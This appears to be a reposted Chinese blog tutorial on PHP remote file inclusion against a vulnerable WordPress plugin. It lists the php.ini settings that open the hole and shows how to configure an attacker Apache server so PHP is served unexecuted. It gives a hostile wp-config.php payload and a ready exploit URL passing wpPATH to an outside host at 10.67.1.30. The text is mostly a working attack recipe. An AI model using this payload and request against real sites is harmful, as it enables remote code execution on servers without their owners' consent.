zoukankan      html  css  js  c++  java
  • 修改部分php配置实现 远程包含 攻击

     
    1. 调试期间,可以打开display_errors = On
    2. 目标机使用了include、require或require_once
    3. 目标机配置
      a) register_globals = On
      b) allow_url_fopen = On
      c) allow_url_include = On
    这样的目标就可以进行攻击了
     
    自己搭建简易的服务器,apache + php 即可
    修改httpd.conf中,将后缀为php的,从而避免代码在攻击端就被执行,
    #AddType application/x-httpd-php .php .html .htm
     
    根据漏洞代码,生成对应的环境,例如:
    if (!$_POST) $wppath=$_GET['wpPATH'];
    else $wppath=$_POST['wpPATH'];
    require_once($wppath.'/wp-config.php');
     
    我们就可以建立一个可访问的文件夹bad_guy,
    增加读权限order allow,deny allow from all ,
    然后在里面新建一个wp-config.php
    <?php
            mkdir('c:\exploit');
            phpinfo();
            exit;
    ?>

    ~然后请求一下就行了

    /wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://10.67.1.30/bad_guy

    来张效果图:

  • 相关阅读:
    继承
    对象与类
    反射
    I/O流
    字符串
    Map的entrySet()方法
    接口与内部类
    Git Usage Summary
    HTML(5)
    毕业设计:下载
  • 原文地址:https://www.cnblogs.com/amaoxiaozhu/p/2876194.html
Copyright © 2011-2022 走看看